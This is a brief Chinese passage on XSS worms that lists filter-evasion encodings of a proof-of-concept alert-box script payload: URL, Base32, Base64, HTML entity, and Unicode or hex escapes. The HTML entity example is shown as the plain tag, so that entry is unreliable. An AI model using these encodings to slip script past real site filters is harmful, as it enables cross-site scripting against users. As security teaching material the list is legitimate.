3.XSS蠕蟲
對于XSS蠕蟲,無非就是在用戶端送出的時候繞過過濾和轉義,可以在繼續在浏覽器端執行的js 等代碼,這裡提供幾種加密方式:
原型:<script>alert(XSS)</script>
URL Encode: 大小寫(所謂URL編碼就是:把所有非字母數字字元都将被替換成百分号(%)後跟兩位十六進制數,空格則編碼為加号(+))
%3cscript%3ealert('XSS')%3c/script%3e
%3Cscript%3Ealert%28XSS%29%3C/script%3E
Base32 Encode:
hrzwg4tjob2d4ylmmvzhikcyknjsspbponrxe2lqoq7a
Base64 Encode:
PHNjcmlwdD5hbGVydChYU1MpPC9zY3JpcHQ+
HTML Entities Encode:
<script>alert(XSS)</script>
Unicode or Hex繞過(隻是列舉幾個):
' == \u0027
' == \x27
+ == \u002b
+ == \x2b